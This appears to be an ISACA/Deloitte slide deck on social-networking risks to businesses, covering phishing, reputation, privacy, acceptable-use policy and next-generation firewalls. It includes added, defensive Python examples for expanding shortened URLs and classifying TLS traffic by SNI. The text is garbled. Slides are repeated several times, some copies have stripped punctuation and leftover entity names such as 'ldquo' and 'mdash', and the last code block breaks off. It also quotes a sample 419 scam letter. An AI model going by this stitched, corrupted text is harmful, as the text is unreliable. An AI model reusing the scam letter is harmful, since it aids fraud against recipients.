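            warnings.append(f"non-web scheme in redirect: {nxt}")
            break
        chain.append(nxt)
        current = nxt
    else:
        warnings.append(f"redirect chain exceeded {max_hops} hops")

    if is_shortened(current):
        warnings.append("final URL is still a shortener (nested shortening)")
    if urlsplit(url).scheme == "https" and urlsplit(current).scheme == "http":
        warnings.append("downgrade from https to http along the chain")
    return {"final": current, "chain": chain, "warnings": warnings}


# --- constructed offline redirect table standing in for live HEAD requests ---
FAKE_REDIRECTS = {
    "http://bit.ly/3xAmpl": (301, {"Location": "http://tr.im/q9z"}),
    "http://tr.im/q9z": (302, {"Location": "https://login-example.test/verify"}),
    "https://login-example.test/verify": (200, {}),
    "http://bit.ly/loop": (301, {"Location": "http://bit.ly/loop"}),
}


def fake_fetch_head(url: str):
    """Stand-in for an HTTP HEAD request, answering from the table above."""
    return FAKE_REDIRECTS.get(url, (404, {}))


if __name__ == "__main__":
    for link in ("http://bit.ly/3xAmpl", "http://bit.ly/loop"):
        result = expand(link, fake_fetch_head)
        print(link, "->", result["final"], "|", " -> ".join(result["chain"]))
        for w in result["warnings"]:
            print("   warning:", w)
```

In production the injected `fetch_head` would issue a real HEAD request with a short timeout and no cookies; the hop limit is what stops a malicious redirect loop from tying up the checker, and the "still a shortener" warning catches the nested-shortener trick used to defeat naive expanders.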
40
Risks and challenges (cont)
• More on phishing — social networks are a target-rich environment
41
Risks and challenges (cont)
• More on phishing — social networks are a target-rich environment (cont)
“Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now, i was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School, my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year…” – See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – they now use LinkedIn to target specific individuals
42
Risks and challenges (cont)
• Reputation — Damage to the company's brand or reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so that employees are unaware of the promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the owner
• Intellectual property theft — Inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium
43
Risks and challenges (cont)
• Failures in the use of social media — most companies that use social media don't approach it the way they would any other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
“Fully half of all social media investments will fail” — Gartner
44
Risks and challenges (cont)
“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster Sings Chocolate Rain' about 1,000 times.” – Michael Scott, The Office
• Productivity — Users employ social media tools for non-productive purposes such as socializing (“social notworking”)
http://news.bbc.co.uk/2/hi/business/8325865.stm
45
Risks and challenges (cont)
• Technical integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – “Sign in using your account with”: Facebook, Twitter, Myspace, Yahoo!, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, Flickr
46
Risks and challenges (cont)
• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that “The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all”
  – Or, alternatively, as a formula: see http://en.wikipedia.org/wiki/Beckstrom's_law
47
Risks and challenges (cont)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
48
A quick word on privacy
“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder
“If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.
49
A quick word on privacy (cont)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence – limited attempt to address
50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
51
Responding to the risks and challenges (cont)
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
52
Responding to the risks and challenges (cont)
• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate over ports 80 and 443, the same ports as ordinary web browsing, so a port-based rule cannot tell them apart
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
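To make the port-versus-application distinction concrete, the following is an added example written for this page (not code from the presentation or from any firewall vendor). Every flow it inspects is on port 80 or 443, so a port-based rule allows all of them; the application-aware path instead reads the HTTP Host header or the server name (SNI) in the TLS ClientHello, looks the source address up in a user directory, and applies a per-group policy. The application signatures, the IP-to-user directory, the policy table and the sample flows are all assumptions constructed for the demonstration, and the ClientHello builder exists only to produce test input.

```python
"""Application-aware vs port-based firewall decisions over ports 80/443.

Added example, not from the original presentation or any vendor's product.
The app signatures, user directory, policy and flows are constructed for the
demonstration; build_client_hello() only manufactures test packets.
"""
import struct


def build_client_hello(sni: str) -> bytes:
    """Construct a minimal TLS 1.2 ClientHello carrying an SNI extension (test data only)."""
    name = sni.encode()
    entry = b"\x00" + struct.pack("!H", len(name)) + name            # name_type 0 = host_name
    sni_list = struct.pack("!H", len(entry)) + entry
    ext = struct.pack("!HH", 0, len(sni_list)) + sni_list              # extension type 0 = server_name
    body = (b"\x03\x03" + b"\x11" * 32 + b"\x00"                       # version, random, empty session id
            + b"\x00\x02\xc0\x2f" + b"\x01\x00"                        # one cipher suite, null compression
            + struct.pack("!H", len(ext)) + ext)
    hs = b"\x01" + struct.pack("!I", len(body))[1:] + body             # handshake type 1, 3-byte length
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs           # TLS record header


def extract_sni(record: bytes):
    """Return the server_name from a TLS ClientHello record, or None if absent or malformed."""
    try:
        if record[0] != 0x16:
            return None
        hs = record[5:5 + struct.unpack("!H", record[3:5])[0]]
        if hs[0] != 0x01:
            return None
        p = 4 + 2 + 32                                                 # header, version, random
        p += 1 + hs[p]                                                 # session_id
        p += 2 + struct.unpack("!H", hs[p:p + 2])[0]                   # cipher_suites
        p += 1 + hs[p]                                                 # compression_methods
        end = p + 2 + struct.unpack("!H", hs[p:p + 2])[0]
        p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack("!HH", hs[p:p + 4])
            p += 4
            if etype == 0 and hs[p + 2] == 0:                          # server_name, host_name entry
                nlen = struct.unpack("!H", hs[p + 3:p + 5])[0]
                return hs[p + 5:p + 5 + nlen].decode("ascii")
            p += elen
    except (IndexError, struct.error, UnicodeDecodeError):
        pass
    return None


def http_host(payload: bytes):
    """Return the Host header of a plaintext HTTP request, or None."""
    for line in payload.split(b"\r\n")[1:]:
        if line.lower().startswith(b"host:"):
            return line.split(b":", 1)[1].strip().decode("ascii", "replace")
    return None


# Constructed tables: host suffix -> (application, category); IP -> (user, group); group -> categories
APP_SIGNATURES = {"facebook.com": ("facebook", "social-networking"),
                  "fbcdn.net": ("facebook", "social-networking"),
                  "twitter.com": ("twitter", "social-networking"),
                  "linkedin.com": ("linkedin", "social-networking"),
                  "salesforce.com": ("salesforce", "business")}
USER_DIRECTORY = {"10.0.1.25": ("alice", "marketing"), "10.0.1.40": ("bob", "engineering")}
POLICY = {"marketing": {"social-networking", "business", "web"},
          "engineering": {"business", "web"}}


def identify_app(host):
    """Map a server name to an application by suffix match; unknown hosts are plain web."""
    h = (host or "").lower().rstrip(".")
    for suffix, app in APP_SIGNATURES.items():
        if h == suffix or h.endswith("." + suffix):
            return app
    return ("unknown", "web")


def legacy_decision(flow):
    """Port-based firewall: anything on 80/443 looks like ordinary web browsing."""
    return "allow" if flow["dst_port"] in (80, 443) else "deny"


def ngfw_decision(flow):
    """App- and user-aware decision: who is talking, to which application, and is it permitted."""
    user, group = USER_DIRECTORY.get(flow["src_ip"], ("unknown", "default"))
    host = extract_sni(flow["payload"]) if flow["dst_port"] == 443 else http_host(flow["payload"])
    app, category = identify_app(host)
    action = "allow" if category in POLICY.get(group, set()) else "deny"
    return {"user": user, "app": app, "category": category, "action": action}


SAMPLE_FLOWS = [  # constructed traffic, all on 80/443
    {"src_ip": "10.0.1.25", "dst_port": 443, "payload": build_client_hello("www.facebook.com")},
    {"src_ip": "10.0.1.40", "dst_port": 443, "payload": build_client_hello("www.facebook.com")},
    {"src_ip": "10.0.1.40", "dst_port": 80,
     "payload": b"GET /1.1/statuses HTTP/1.1\r\nHost: api.twitter.com\r\n\r\n"},
    {"src_ip": "10.0.1.40", "dst_port": 443, "payload": build_client_hello("login.salesforce.com")},
]

if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        print(f["src_ip"], f["dst_port"], "legacy:", legacy_decision(f), "ngfw:", ngfw_decision(f))
```

The SNI is sent in the clear, which is what lets a firewall classify TLS traffic without decrypting it; a product that also inspects content, as the slide lists, would additionally terminate and re-encrypt the session. Encrypted ClientHello, or a client that omits SNI, makes this particular signal unavailable, which is why vendors combine several identification methods rather than relying on one.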
53
What is next in the world of social networking
54
Where we are at today
• Enterprise social media has crossed the tipping point and is no longer considered an “emerging” technology
“The Hype Cycle” – http://en.wikipedia.org/wiki/Hype_cycle
55
What's next in the world of social networking
• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, more than 400% of the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example, Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
56
Some further predictions
• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… something important that has the potential to change the world, though we have a long way to go” — Biz Stone, co-founder of Twitter
57
Q&A
58
Today's Presenters
Nelson Gibbs, Senior Manager, AERS – Audit & Enterprise Risk Services, Deloitte & Touche LLP, ngibbs@deloitte.com, +1 213 593 4241
59
Appendix
• Additional resources
  – Gopal, Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friend's location and provide directions to them

www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" – Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go" – Biz Stone, co-founder of Twitter

www.isaca.org 57
Q&A

www.isaca.org 58
Today's Presenters
Nelson Gibbs, Senior Manager, AERS – Audit & Enterprise Risk Services, Deloitte & Touche LLP, ngibbs@deloitte.com, +1 213 593 4241

www.isaca.org 59
Appendix
• Additional resources
  – Gopal, Raj, et al. "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist – A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Wall of Facebook: The Social Network's Plan to Dominate the Internet – and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009) – http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009) – http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site – http://www.bcs.org/socialmedia

www.isaca.org 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
www.isaca.org 42
Risks and challenges (cont.)
• Reputation: damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so staff may be unaware of any promotions or offers being publicized
• Copyright violation: third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft: inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of Social Media: most companies that use Social Media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail" – Gartner

www.isaca.org 44
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster sings Chocolate Rain' about 1000 times." – Michael Scott, from The Office
• Productivity: users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical Integration: most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – "Sign in using your account with":
    • Facebook
    • Twitter
    • Myspace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr

www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding: in many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification: researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  Or alternatively
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
Risks and challenges (cont.)
• Litigation issues: discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation

www.isaca.org 48
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
– Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
– Eric Schmidt, CEO, Google Inc.

www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
www.isaca.org 50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)

www.isaca.org 51
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52
Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
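As an added illustration (not part of the deck), the Python below contrasts a port-based rule set with the application- and user-aware policy the slide describes: the port rule sees only "443, allow", while the application-aware policy identifies the application from the TLS server name, maps the source address to a user and group, and controls the function (browse vs. post) per group. The flow records, host names, users, groups and paths are constructed sample data.

```python
"""Port-based vs. application-aware policy over constructed flow records.
Added example; the signatures, identity mapping and policy are illustrative."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src_ip: str
    dst_port: int
    sni: str      # TLS Server Name Indication / HTTP Host seen by the inspecting firewall
    method: str   # HTTP method visible after decryption ("-" if opaque)
    path: str


# Constructed identity mapping: the "identify users regardless of IP address" step.
USER_BY_IP = {"10.0.0.5": "alice", "10.0.0.9": "bob", "10.0.0.12": "carol"}
GROUP_BY_USER = {"alice": "marketing", "bob": "engineering", "carol": "engineering"}

# Constructed application signatures: host suffix -> application name.
APP_SIGNATURES = {
    "facebook.com": "facebook",
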